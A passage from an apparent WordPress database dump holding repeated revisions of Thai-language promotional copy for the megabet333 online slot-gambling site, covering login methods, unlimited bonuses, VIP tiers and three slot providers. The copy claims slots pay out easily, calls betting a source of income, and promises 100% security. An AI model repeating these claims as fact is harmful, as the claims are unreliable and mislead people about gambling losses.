โบนัสพิเศษรายเดือน หรือสิทธิ์เข้าร่วมกิจกรรมสุดเอ็กซ์คลูซีฟที่สมาชิกทั่วไปเข้าไม่ได้ อีกทั้งเรายังมีช่องทางติดต่อที่หลากหลาย ทั้งแชทสดในหน้าเว็บ Line Official และระบบช่วยเหลือผ่านแอปพลิเคชัน ทุกช่องทางตอบกลับไวภายในไม่กี่นาที ทีมงานอยู่ประจำตลอด 24 ชั่วโมง เพื่อให้ผู้เล่นมั่นใจได้ว่าไม่มีคำว่าปล่อยปัญหาทิ้งไว้ แม้แต่ผู้เล่นใหม่ที่ยังไม่คุ้นกับระบบก็ไม่ต้องกังวล เพราะทีมงานพร้อมแนะนำทุกขั้นตอน ตั้งแต่การสมัคร การฝากถอน ไปจนถึงการเลือกเกมที่เหมาะสมกับงบของคุณทุกอย่างให้คำตอบอย่างมืออาชีพ</p> <h2>สุดพิเศษ 3 ค่ายเกมน่าลอง กำเงินแค่สิบบาทก็ปั่นสล็อต\nลุ้นรวยได้เลย</h2> <p>แน่นอนว่าการสร้างรายได้หรือการลงทุนไม่ใช่เรื่องยากอย่างที่คิด เว็บของเรามีพันธมิตรที่จะทำให้ท่านได้เข้าถึงเกมต่าง ๆ ก่อนใคร แถมยังนำเสนอเกมใหม่ ๆ ที่เล่นสนุก แตกง่าย ไม่ต้องใช้เงินลงทุนสูงด้วย โดยมี 3 ค่ายเกมทำเงินที่น่าลุ้นดังต่อไปนี้ </p><h3><b>PG Slot</b></h3><p>ค่ายเกมที่ใคร ๆ ก็พูดถึงในวงการเว็บสล็อตคาสิโนต้องยกให้ pg Slot เพราะขึ้นชื่อเรื่องภาพกราฟิกสวย เพลงประกอบเร้าใจ และฟีเจอร์โบนัสที่ไม่เหมือนใคร เกมทุกเกมจากค่ายนี้ถูกออกแบบให้เล่นง่าย แต่มีรายละเอียดลึกสำหรับคนที่ชอบวางกลยุทธ์ในการหมุนสล็อต จุดเด่นของ pg Slot คือ ระบบเกมที่ลื่นไหลรองรับทุกอุปกรณ์ ทั้งมือถือและคอมพิวเตอร์ โดยไม่ต้องดาวน์โหลดแอปพลิเคชันให้ยุ่งยาก นอกจากนี้ยังมีเกมใหม่อัปเดตทุกเดือน เช่น Mahjong Ways, Lucky Neko, หรือ Treasures of Aztec ที่การันตีความฮอตทุกงวด โบนัสแตกหนักแทบทุกสปิน ใครที่ชอบแนวเกมกราฟิกแฟนตาซี หรือสายมินิมอลเล่นเพลิน ๆ รับรองว่า pg Slot คือคำตอบที่ทำให้คุณติดใจตั้งแต่ครั้งแรกที่หมุนแน่นอน</p><h3><b>XO Slot</b></h3><p>อีกหนึ่งตำนานแห่งวงการเกมสล็อตที่คอเกมรุ่นเก๋ายังพูดถึงไม่ขาดปากก็คือ XO Slot ค่ายเกมสุดคลาสสิกที่ครองใจนักเดิมพันมานาน จุดเด่นคือเล่นง่าย โบนัสเข้าบ่อย และยังคงเสน่ห์ของสล็อตในรูปแบบดั้งเดิมไว้ครบถ้วน เกมของ XO Slot ถูกออกแบบมาให้เหมาะกับทั้งมือใหม่และมืออาชีพ เพราะไม่ต้องใช้ทุนเยอะก็สามารถลุ้นรางวัลใหญ่ได้ มีระบบแจ็กพอตสุ่มที่แตกบ่อยจนถูกเรียกว่า “ค่ายสล็อตสายโชค” ไม่ว่าจะเป็นเกมฮิตอย่าง Roma, Supreme Caishen หรือ Lucky Panda ทุกเกมมีเอกลักษณ์เฉพาะตัว ทั้งภาพ เสียง และอัตราจ่ายที่คุ้มค่า เหมาะกับคนที่ชอบเล่นสล็อตแนวเรียบง่ายแต่ให้ผลตอบแทนเกินคาด เล่นเพลินแตกบ่อย ต้อง XO Slot เท่านั้น</p><h3><b>Joker Slot</b></h3><p>ถ้าพูดถึงค่ายที่รวมเกมสล็อตคาสิโนสุดมันส์ แตกแรง จัดเต็มทุกแนว ต้องไม่พลาด โจ๊กเกอร์สล็อต หรือ Joker Gaming ที่ขึ้นชื่อเรื่องโบนัสก้อนใหญ่และเกมคุณภาพระดับสากล ความพิเศษของค่ายนี้คือระบบเกมเสถียร เล่นได้ต่อเนื่องไม่มีสะดุด พร้อมด้วยฟีเจอร์ซื้อฟรีสปินสุดคุ้มที่ทำให้ผู้เล่นมีโอกาสคว้ารางวัลใหญ่โดยไม่ต้องรอนาน เกมยอดนิยมของค่ายนี้ เช่น Roma X, Queen 2, และ Joker Madness ล้วนมีรูปแบบการเล่นที่เข้าใจง่าย และโบนัสแตกไวเกินต้าน จุดเด่นอีกอย่างคือการรองรับระบบภาษาไทยเต็มรูปแบบ พร้อมโหมดทดลองเล่นฟรีสำหรับมือใหม่ ใครที่อยากสัมผัสความตื่นเต้นของเกมที่ทั้งดุดันและแจกจริง โจ๊กเกอร์สล็อตคือค่ายที่ไม่ควรพลาด เพราะที่นี่ไม่ใช่แค่เล่นเพื่อความสนุก แต่ยังเป็นแหล่งสร้างรายได้ที่คุ้มค่าทุกการสปินจริง ๆ</p> <h2>สล็อตแตกง่าย megabet333 ระบบเสถียร การให้บริการพรีเมี่ยมต่อเนื่อง 24 ชม. </h2> <p>เว็บเล่นเกมที่พร้อมให้บริการตลอด 24 ชั่วโมง <b>megabet333 </b>สนุกได้แบบเต็มที่ ออกแบบมาเพื่อให้สมาชิกทุกคนรู้สึกเหมือนอยู่ในคาสิโนจริง ทีมงานซัพพอร์ตมืออาชีพพร้อมดูแลตลอด 24 ชั่วโมง ไม่ว่าจะเป็นการแก้ปัญหาเรื่องการฝากถอน การรับโบนัส หรือคำถามทั่วไปเกี่ยวกับเกม ผู้เล่นสามารถติดต่อได้ทุกช่องทางทั้งแชทสด ไลน์ หรือระบบอีเมล ซึ่งตอบกลับไวภายในไม่กี่นาทีเท่านั้น ใช้เทคโนโลยี SSL Encryption ที่เทียบเท่ามาตรฐานเว็บคาสิโนระดับโลก ทำให้ข้อมูลของผู้เล่นทั้งหมดถูกเก็บเป็นความลับปลอดภัยจากการโจมตีและการรั่วไหลของข้อมูล 100% มีทีมเทคนิคที่คอยตรวจสอบและอัปเดตระบบให้พร้อมใช้งานอยู่เสมอ ไม่ว่าจะกลางวันหรือกลางคืน เว็บยังคงให้บริการได้แบบไม่มีหยุดพักเพื่อให้ผู้เล่นมั่นใจได้ว่าทุกการเข้าเล่นจะได้รับประสบการณ์ที่ดีที่สุดอย่างต่อเนื่อง อยากสนุกแบบราบรื่นต้องที่นี่ที่เดียว</p>','HOME','','inherit','closed','closed','','44-revision-v1','','','2025-10-23 08:40:14','2025-10-23 08:40:14','',44,'https://megabet333.biz/?p=143',0,'revision','',0),(144,3,'2025-10-23 08:40:43','2025-10-23 08:40:43','<img width=\"500\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz.webp 500w, https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz-150x150.webp 150w\" sizes=\"(max-width: 500px) 100vw, 500px\" /> <img width=\"500\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz.webp 500w, https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz-150x150.webp 150w\" sizes=\"(max-width: 500px) 100vw, 500px\" /> <h1>megabet333 ล็อกอินก็รับได้ แจกโบนัสไม่จำกัดปัง ๆ ระบบ VIP สุดพิเศษ</h1> <p>แค่ล็อกอินก็สนุกกับเราได้เลย <b>megabet333 </b>พร้อมเงินโบนัสที่แจกให้แบบปัง ๆ ตอบโจทย์ทั้งความสนุกและความคุ้มค่าในเวลาเดียวกัน ออกแบบมาเพื่อตอบแทนผู้เล่นประจำอย่างแท้จริง ใครที่ชอบสะสมแต้ม เล่นต่อเนื่อง ระบบจะอัปเกรดระดับอัตโนมัติให้ทันที พร้อมรับสิทธิพิเศษเหนือใคร ทั้งโบนัสรายวัน โบนัสคืนยอดเสีย และกิจกรรมลับเฉพาะสมาชิก VIP เท่านั้น ไม่ว่าจะหมุนสล็อต หรือเล่นคาสิโนสดก็ได้รับสิทธิ์สะสมแต้มแลกของรางวัลแบบไม่อั้น อีกทั้งเรื่องความปลอดภัยเรายังจัดเต็มไม่แพ้ใคร ด้วยเทคโนโลยีป้องกันข้อมูลขั้นสูง การฝากถอนทำได้รวดเร็วผ่านระบบออโต้ รองรับทั้งธนาคารและวอลเล็ต เพิ่มความสะดวกให้กับผู้เล่นทุกกลุ่ม นอกจากนี้ทีมงานยังดูแลตลอด 24 ชั่วโมง พร้อมตอบคำถามทุกปัญหาอย่างมืออาชีพ</p> <h2>megabet333 3 วิธีล็อกอินเว็บสล็อตแตกง่าย อันดับ 1 เปิดเร็วไม่ต้องยื่นเอกสาร</h2> <p>ง่าย ๆ ล็อกกอินเร็ว เปิดยูสกับเราไม่ยาก <b>megabet333 </b>ออกแบบระบบล็อกอินให้ใช้งานสะดวก ปลอดภัย และใช้เวลาไม่ถึงหนึ่งนาที ก็สามารถเริ่มเดิมพันได้ทันทีโดยไม่ต้องส่งเอกสารให้ยุ่งยากเหมือนเว็บทั่วไป สามารถดำเนินการง่าย ๆ แค่ 3 ขั้นตอนเท่านั้น โดยมีขั้นตอนดังต่อไปนี้ </p><ul><li><b>ล็อกอินผ่านเบอร์มือถือ </b>เพียงกรอกเบอร์โทรศัพท์ของคุณ ระบบจะส่งรหัส OTP เพื่อยืนยันตัวตนอย่างรวดเร็ว จากนั้นสามารถตั้งรหัสผ่านและเข้าสู่หน้าเกมได้ทันที เหมาะสำหรับผู้เล่นที่ต้องการความรวดเร็ว ปลอดภัย และไม่อยากจำข้อมูลซับซ้อน</li><li><b>ล็อกอินผ่านบัญชีอีเมลหรือโซเชียลมีเดีย </b>เปิดให้สมาชิกใหม่เชื่อมต่อบัญชีด้วยอีเมล หรือเข้าสู่ระบบผ่าน Facebook, Google หรือ Line ได้โดยตรง เรียกว่าแค่กดครั้งเดียวก็เข้าเล่นได้ทันที ไม่ต้องสมัครซ้ำให้เสียเวลา และยังสามารถใช้ระบบนี้ในทุกอุปกรณ์ทั้งมือถือและคอมพิวเตอร์</li><li><b>ล็อกอินอัตโนมัติผ่านระบบจำเครื่อง </b>สำหรับใครที่เล่นบ่อย ระบบจะจดจำข้อมูลการเข้าล่าสุดไว้แบบเข้ารหัส ปลอดภัยทุกครั้งที่กลับมา ไม่ต้องกรอกข้อมูลใหม่อีก ช่วยให้เริ่มเกมได้ไวกว่าเดิม เหมาะกับสายปั่นสล็อตที่ชอบความรวดเร็วต่อเนื่อง ท่านสามารถเข้าสนุกกับเราได้เลยโดยไม่ต้องเข้าหลาย ๆ รอบ หากเข้าเล่นกับเว็บของเราเป็นประจำเป็นอยู่แล้วก็สามารถเข้าและเริ่มต้นเดิมพันได้เลย </li></ul> <img width=\"800\" height=\"334\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Character_slot_1_-_Megabet333-Biz-1024x427.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Character_slot_1_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/Character_slot_1_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/Character_slot_1_-_Megabet333-Biz-768x320.webp 768w, https://amb18b.com/wp-content/uploads/2025/10/Character_slot_1_-_Megabet333-Biz.webp 1200w\" sizes=\"(max-width: 800px) 100vw, 800px\" /> <h2>megabet333 โบนัสไม่จำกัด ขนให้รับแบบจัดหนักไม่มีคำว่าอั้นชัวร์</h2> <p>แจกให้จริง ๆ <b>megabet333 </b>ให้คุณรับโบนัสแบบไม่จำกัดได้เลย ขนทั้งความสนุกพร้อมข้อเสนอแบบไม่อั้นรับง่ายชัวร์เต็ม ๆ ขนความคุ้มค่ามาเสิร์ฟให้ผู้เล่นทุกคนแบบไม่มีลิมิต เริ่มตั้งแต่สมัครสมาชิกครั้งแรกก็รับได้ทันทีไม่ต้องลุ้นไม่ต้องรอแอดมินกดยืนยัน เพราะระบบออโต้ของที่นี่พร้อมแจกให้แบบเรียลไทม์เพียงล็อกอินเข้ามาก็มีโบนัสรออยู่ทุกวัน ไม่ว่าจะฝากเท่าไหร่ เล่นกี่รอบ หรืออยู่ในระดับสมาชิกใดก็สามารถเข้าร่วมโปรโมชั่นได้ทั้งหมด ไม่ต้องกลัวว่าจะหมดสิทธิ์หรือถูกจำกัดยอด โบนัสทุกแบบเปิดให้รับซ้ำได้ทุกวัน ทั้งโบนัสต้อนรับ โบนัสฝากรายวัน โบนัสคืนยอดเสีย รวมถึงกิจกรรมพิเศษในเทศกาลต่าง ๆ ที่จัดเต็มของรางวัลมูลค่าสูง ยิ่งเล่นยิ่งสะสมแต้มแลกรางวัลได้จริง ทั้งเครดิตเพิ่มของรางวัลพรีเมียมหรือสิทธิ์เข้าร่วมกิจกรรมพิเศษเฉพาะสมาชิกเท่านั้นเรียกได้ว่าทุกการเล่นของคุณมีค่าทุกวินาที</p> <h2>ดูแลระบบสมาชิกแบบ VIP ทีมงานพร้อมช่วยเหลือ ไม่มีเหวี่ยงแน่นอน </h2> <p>แน่นอนว่าความแตกต่างที่หลายคนอาจไม่รู้ของเว็บที่มีมาตรฐาน ระบบสมาชิก VIP ถูกออกแบบมาเพื่อให้ผู้เล่นได้รับสิทธิพิเศษเหนือใคร ยิ่งเล่นมาก ระดับสมาชิกก็จะสูงขึ้นตามระบบสะสมคะแนน และทุกระดับจะได้รับบริการเฉพาะตัว ไม่ว่าจะเป็นเจ้าหน้าที่ดูแลส่วนตัว โบนัสพิเศษรายเดือน หรือสิทธิ์เข้าร่วมกิจกรรมสุดเอ็กซ์คลูซีฟที่สมาชิกทั่วไปเข้าไม่ได้ อีกทั้งเรายังมีช่องทางติดต่อที่หลากหลาย ทั้งแชทสดในหน้าเว็บ Line Official และระบบช่วยเหลือผ่านแอปพลิเคชัน ทุกช่องทางตอบกลับไวภายในไม่กี่นาที ทีมงานอยู่ประจำตลอด 24 ชั่วโมง เพื่อให้ผู้เล่นมั่นใจได้ว่าไม่มีคำว่าปล่อยปัญหาทิ้งไว้ แม้แต่ผู้เล่นใหม่ที่ยังไม่คุ้นกับระบบก็ไม่ต้องกังวล เพราะทีมงานพร้อมแนะนำทุกขั้นตอน ตั้งแต่การสมัคร การฝากถอน ไปจนถึงการเลือกเกมที่เหมาะสมกับงบของคุณทุกอย่างให้คำตอบอย่างมืออาชีพ</p> <h2>สุดพิเศษ 3 ค่ายเกมน่าลอง กำเงินแค่สิบบาทก็ปั่นสล็อต\nลุ้นรวยได้เลย</h2> <p>แน่นอนว่าการสร้างรายได้หรือการลงทุนไม่ใช่เรื่องยากอย่างที่คิด เว็บของเรามีพันธมิตรที่จะทำให้ท่านได้เข้าถึงเกมต่าง ๆ ก่อนใคร แถมยังนำเสนอเกมใหม่ ๆ ที่เล่นสนุก แตกง่าย ไม่ต้องใช้เงินลงทุนสูงด้วย โดยมี 3 ค่ายเกมทำเงินที่น่าลุ้นดังต่อไปนี้ </p><h3><b>PG Slot</b></h3><p>ค่ายเกมที่ใคร ๆ ก็พูดถึงในวงการเว็บสล็อตคาสิโนต้องยกให้ pg Slot เพราะขึ้นชื่อเรื่องภาพกราฟิกสวย เพลงประกอบเร้าใจ และฟีเจอร์โบนัสที่ไม่เหมือนใคร เกมทุกเกมจากค่ายนี้ถูกออกแบบให้เล่นง่าย แต่มีรายละเอียดลึกสำหรับคนที่ชอบวางกลยุทธ์ในการหมุนสล็อต จุดเด่นของ pg Slot คือ ระบบเกมที่ลื่นไหลรองรับทุกอุปกรณ์ ทั้งมือถือและคอมพิวเตอร์ โดยไม่ต้องดาวน์โหลดแอปพลิเคชันให้ยุ่งยาก นอกจากนี้ยังมีเกมใหม่อัปเดตทุกเดือน เช่น Mahjong Ways, Lucky Neko, หรือ Treasures of Aztec ที่การันตีความฮอตทุกงวด โบนัสแตกหนักแทบทุกสปิน ใครที่ชอบแนวเกมกราฟิกแฟนตาซี หรือสายมินิมอลเล่นเพลิน ๆ รับรองว่า pg Slot คือคำตอบที่ทำให้คุณติดใจตั้งแต่ครั้งแรกที่หมุนแน่นอน</p><h3><b>XO Slot</b></h3><p>อีกหนึ่งตำนานแห่งวงการเกมสล็อตที่คอเกมรุ่นเก๋ายังพูดถึงไม่ขาดปากก็คือ XO Slot ค่ายเกมสุดคลาสสิกที่ครองใจนักเดิมพันมานาน จุดเด่นคือเล่นง่าย โบนัสเข้าบ่อย และยังคงเสน่ห์ของสล็อตในรูปแบบดั้งเดิมไว้ครบถ้วน เกมของ XO Slot ถูกออกแบบมาให้เหมาะกับทั้งมือใหม่และมืออาชีพ เพราะไม่ต้องใช้ทุนเยอะก็สามารถลุ้นรางวัลใหญ่ได้ มีระบบแจ็กพอตสุ่มที่แตกบ่อยจนถูกเรียกว่า “ค่ายสล็อตสายโชค” ไม่ว่าจะเป็นเกมฮิตอย่าง Roma, Supreme Caishen หรือ Lucky Panda ทุกเกมมีเอกลักษณ์เฉพาะตัว ทั้งภาพ เสียง และอัตราจ่ายที่คุ้มค่า เหมาะกับคนที่ชอบเล่นสล็อตแนวเรียบง่ายแต่ให้ผลตอบแทนเกินคาด เล่นเพลินแตกบ่อย ต้อง XO Slot เท่านั้น</p><h3><b>Joker Slot</b></h3><p>ถ้าพูดถึงค่ายที่รวมเกมสล็อตคาสิโนสุดมันส์ แตกแรง จัดเต็มทุกแนว ต้องไม่พลาด โจ๊กเกอร์สล็อต หรือ Joker Gaming ที่ขึ้นชื่อเรื่องโบนัสก้อนใหญ่และเกมคุณภาพระดับสากล ความพิเศษของค่ายนี้คือระบบเกมเสถียร เล่นได้ต่อเนื่องไม่มีสะดุด พร้อมด้วยฟีเจอร์ซื้อฟรีสปินสุดคุ้มที่ทำให้ผู้เล่นมีโอกาสคว้ารางวัลใหญ่โดยไม่ต้องรอนาน เกมยอดนิยมของค่ายนี้ เช่น Roma X, Queen 2, และ Joker Madness ล้วนมีรูปแบบการเล่นที่เข้าใจง่าย และโบนัสแตกไวเกินต้าน จุดเด่นอีกอย่างคือการรองรับระบบภาษาไทยเต็มรูปแบบ พร้อมโหมดทดลองเล่นฟรีสำหรับมือใหม่ ใครที่อยากสัมผัสความตื่นเต้นของเกมที่ทั้งดุดันและแจกจริง โจ๊กเกอร์สล็อตคือค่ายที่ไม่ควรพลาด เพราะที่นี่ไม่ใช่แค่เล่นเพื่อความสนุก แต่ยังเป็นแหล่งสร้างรายได้ที่คุ้มค่าทุกการสปินจริง ๆ</p> <h2>สล็อตแตกง่าย megabet333 ระบบเสถียร การให้บริการพรีเมี่ยมต่อเนื่อง 24 ชม. </h2> <p>เว็บเล่นเกมที่พร้อมให้บริการตลอด 24 ชั่วโมง <b>megabet333 </b>สนุกได้แบบเต็มที่ ออกแบบมาเพื่อให้สมาชิกทุกคนรู้สึกเหมือนอยู่ในคาสิโนจริง ทีมงานซัพพอร์ตมืออาชีพพร้อมดูแลตลอด 24 ชั่วโมง ไม่ว่าจะเป็นการแก้ปัญหาเรื่องการฝากถอน การรับโบนัส หรือคำถามทั่วไปเกี่ยวกับเกม ผู้เล่นสามารถติดต่อได้ทุกช่องทางทั้งแชทสด ไลน์ หรือระบบอีเมล ซึ่งตอบกลับไวภายในไม่กี่นาทีเท่านั้น ใช้เทคโนโลยี SSL Encryption ที่เทียบเท่ามาตรฐานเว็บคาสิโนระดับโลก ทำให้ข้อมูลของผู้เล่นทั้งหมดถูกเก็บเป็นความลับปลอดภัยจากการโจมตีและการรั่วไหลของข้อมูล 100% มีทีมเทคนิคที่คอยตรวจสอบและอัปเดตระบบให้พร้อมใช้งานอยู่เสมอ ไม่ว่าจะกลางวันหรือกลางคืน เว็บยังคงให้บริการได้แบบไม่มีหยุดพักเพื่อให้ผู้เล่นมั่นใจได้ว่าทุกการเข้าเล่นจะได้รับประสบการณ์ที่ดีที่สุดอย่างต่อเนื่อง อยากสนุกแบบราบรื่นต้องที่นี่ที่เดียว</p>','HOME','','inherit','closed','closed','','44-revision-v1','','','2025-10-23 08:40:43','2025-10-23 08:40:43','',44,'https://megabet333.biz/?p=144',0,'revision','',0),(145,3,'2025-10-23 08:40:44','2025-10-23 08:40:44','<img width=\"500\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz.webp 500w, https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz-150x150.webp 150w\" sizes=\"(max-width: 500px) 100vw, 500px\" /> <img width=\"500\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz.webp 500w, https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz-150x150.webp 150w\" sizes=\"(max-width: 500px) 100vw, 500px\" /> <h1>megabet333 ล็อกอินก็รับได้ แจกโบนัสไม่จำกัดปัง ๆ ระบบ VIP สุดพิเศษ</h1> <p>แค่ล็อกอินก็สนุกกับเราได้เลย <b>megabet333 </b>พร้อมเงินโบนัสที่แจกให้แบบปัง ๆ ตอบโจทย์ทั้งความสนุกและความคุ้มค่าในเวลาเดียวกัน ออกแบบมาเพื่อตอบแทนผู้เล่นประจำอย่างแท้จริง ใครที่ชอบสะสมแต้ม เล่นต่อเนื่อง ระบบจะอัปเกรดระดับอัตโนมัติให้ทันที พร้อมรับสิทธิพิเศษเหนือใคร ทั้งโบนัสรายวัน โบนัสคืนยอดเสีย และกิจกรรมลับเฉพาะสมาชิก VIP เท่านั้น ไม่ว่าจะหมุนสล็อต หรือเล่นคาสิโนสดก็ได้รับสิทธิ์สะสมแต้มแลกของรางวัลแบบไม่อั้น อีกทั้งเรื่องความปลอดภัยเรายังจัดเต็มไม่แพ้ใคร ด้วยเทคโนโลยีป้องกันข้อมูลขั้นสูง การฝากถอนทำได้รวดเร็วผ่านระบบออโต้ รองรับทั้งธนาคารและวอลเล็ต เพิ่มความสะดวกให้กับผู้เล่นทุกกลุ่ม นอกจากนี้ทีมงานยังดูแลตลอด 24 ชั่วโมง พร้อมตอบคำถามทุกปัญหาอย่างมืออาชีพ</p> <h2>megabet333 3 วิธีล็อกอินเว็บสล็อตแตกง่าย อันดับ 1 เปิดเร็วไม่ต้องยื่นเอกสาร</h2> <p>ง่าย ๆ ล็อกกอินเร็ว เปิดยูสกับเราไม่ยาก <b>megabet333 </b>ออกแบบระบบล็อกอินให้ใช้งานสะดวก ปลอดภัย และใช้เวลาไม่ถึงหนึ่งนาที ก็สามารถเริ่มเดิมพันได้ทันทีโดยไม่ต้องส่งเอกสารให้ยุ่งยากเหมือนเว็บทั่วไป สามารถดำเนินการง่าย ๆ แค่ 3 ขั้นตอนเท่านั้น โดยมีขั้นตอนดังต่อไปนี้ </p><ul><li><b>ล็อกอินผ่านเบอร์มือถือ </b>เพียงกรอกเบอร์โทรศัพท์ของคุณ ระบบจะส่งรหัส OTP เพื่อยืนยันตัวตนอย่างรวดเร็ว จากนั้นสามารถตั้งรหัสผ่านและเข้าสู่หน้าเกมได้ทันที เหมาะสำหรับผู้เล่นที่ต้องการความรวดเร็ว ปลอดภัย และไม่อยากจำข้อมูลซับซ้อน</li><li><b>ล็อกอินผ่านบัญชีอีเมลหรือโซเชียลมีเดีย </b>เปิดให้สมาชิกใหม่เชื่อมต่อบัญชีด้วยอีเมล หรือเข้าสู่ระบบผ่าน Facebook, Google หรือ Line ได้โดยตรง เรียกว่าแค่กดครั้งเดียวก็เข้าเล่นได้ทันที ไม่ต้องสมัครซ้ำให้เสียเวลา และยังสามารถใช้ระบบนี้ในทุกอุปกรณ์ทั้งมือถือและคอมพิวเตอร์</li><li><b>ล็อกอินอัตโนมัติผ่านระบบจำเครื่อง </b>สำหรับใครที่เล่นบ่อย ระบบจะจดจำข้อมูลการเข้าล่าสุดไว้แบบเข้ารหัส ปลอดภัยทุกครั้งที่กลับมา ไม่ต้องกรอกข้อมูลใหม่อีก ช่วยให้เริ่มเกมได้ไวกว่าเดิม เหมาะกับสายปั่นสล็อตที่ชอบความรวดเร็วต่อเนื่อง ท่านสามารถเข้าสนุกกับเราได้เลยโดยไม่ต้องเข้าหลาย ๆ รอบ หากเข้าเล่นกับเว็บของเราเป็นประจำเป็นอยู่แล้วก็สามารถเข้าและเริ่มต้นเดิมพันได้เลย </li></ul> <img width=\"800\" height=\"334\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Character_slot_1_-_Megabet333-Biz-1024x427.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Character_slot_1_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/Character_slot_1_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/Character_slot_1_-_Megabet333-Biz-768x320.webp 768w, https://amb18b.com/wp-content/uploads/2025/10/Character_slot_1_-_Megabet333-Biz.webp 1200w\" sizes=\"(max-width: 800px) 100vw, 800px\" /> <h2>megabet333 โบนัสไม่จำกัด ขนให้รับแบบจัดหนักไม่มีคำว่าอั้นชัวร์</h2> <p>แจกให้จริง ๆ <b>megabet333 </b>ให้คุณรับโบนัสแบบไม่จำกัดได้เลย ขนทั้งความสนุกพร้อมข้อเสนอแบบไม่อั้นรับง่ายชัวร์เต็ม ๆ ขนความคุ้มค่ามาเสิร์ฟให้ผู้เล่นทุกคนแบบไม่มีลิมิต เริ่มตั้งแต่สมัครสมาชิกครั้งแรกก็รับได้ทันทีไม่ต้องลุ้นไม่ต้องรอแอดมินกดยืนยัน เพราะระบบออโต้ของที่นี่พร้อมแจกให้แบบเรียลไทม์เพียงล็อกอินเข้ามาก็มีโบนัสรออยู่ทุกวัน ไม่ว่าจะฝากเท่าไหร่ เล่นกี่รอบ หรืออยู่ในระดับสมาชิกใดก็สามารถเข้าร่วมโปรโมชั่นได้ทั้งหมด ไม่ต้องกลัวว่าจะหมดสิทธิ์หรือถูกจำกัดยอด โบนัสทุกแบบเปิดให้รับซ้ำได้ทุกวัน ทั้งโบนัสต้อนรับ โบนัสฝากรายวัน โบนัสคืนยอดเสีย รวมถึงกิจกรรมพิเศษในเทศกาลต่าง ๆ ที่จัดเต็มของรางวัลมูลค่าสูง ยิ่งเล่นยิ่งสะสมแต้มแลกรางวัลได้จริง ทั้งเครดิตเพิ่มของรางวัลพรีเมียมหรือสิทธิ์เข้าร่วมกิจกรรมพิเศษเฉพาะสมาชิกเท่านั้นเรียกได้ว่าทุกการเล่นของคุณมีค่าทุกวินาที</p> <h2>ดูแลระบบสมาชิกแบบ VIP ทีมงานพร้อมช่วยเหลือ ไม่มีเหวี่ยงแน่นอน </h2> <p>แน่นอนว่าความแตกต่างที่หลายคนอาจไม่รู้ของเว็บที่มีมาตรฐาน ระบบสมาชิก VIP ถูกออกแบบมาเพื่อให้ผู้เล่นได้รับสิทธิพิเศษเหนือใคร ยิ่งเล่นมาก ระดับสมาชิกก็จะสูงขึ้นตามระบบสะสมคะแนน และทุกระดับจะได้รับบริการเฉพาะตัว ไม่ว่าจะเป็นเจ้าหน้าที่ดูแลส่วนตัว โบนัสพิเศษรายเดือน หรือสิทธิ์เข้าร่วมกิจกรรมสุดเอ็กซ์คลูซีฟที่สมาชิกทั่วไปเข้าไม่ได้ อีกทั้งเรายังมีช่องทางติดต่อที่หลากหลาย ทั้งแชทสดในหน้าเว็บ Line Official และระบบช่วยเหลือผ่านแอปพลิเคชัน ทุกช่องทางตอบกลับไวภายในไม่กี่นาที ทีมงานอยู่ประจำตลอด 24 ชั่วโมง เพื่อให้ผู้เล่นมั่นใจได้ว่าไม่มีคำว่าปล่อยปัญหาทิ้งไว้ แม้แต่ผู้เล่นใหม่ที่ยังไม่คุ้นกับระบบก็ไม่ต้องกังวล เพราะทีมงานพร้อมแนะนำทุกขั้นตอน ตั้งแต่การสมัคร การฝากถอน ไปจนถึงการเลือกเกมที่เหมาะสมกับงบของคุณทุกอย่างให้คำตอบอย่างมืออาชีพ</p> <h2>สุดพิเศษ 3 ค่ายเกมน่าลอง กำเงินแค่สิบบาทก็ปั่นสล็อต\nลุ้นรวยได้เลย</h2> <p>แน่นอนว่าการสร้างรายได้หรือการลงทุนไม่ใช่เรื่องยากอย่างที่คิด เว็บของเรามีพันธมิตรที่จะทำให้ท่านได้เข้าถึงเกมต่าง ๆ ก่อนใคร แถมยังนำเสนอเกมใหม่ ๆ ที่เล่นสนุก แตกง่าย ไม่ต้องใช้เงินลงทุนสูงด้วย โดยมี 3 ค่ายเกมทำเงินที่น่าลุ้นดังต่อไปนี้ </p><h3><b>PG Slot</b></h3><p>ค่ายเกมที่ใคร ๆ ก็พูดถึงในวงการเว็บสล็อตคาสิโนต้องยกให้ pg Slot เพราะขึ้นชื่อเรื่องภาพกราฟิกสวย เพลงประกอบเร้าใจ และฟีเจอร์โบนัสที่ไม่เหมือนใคร 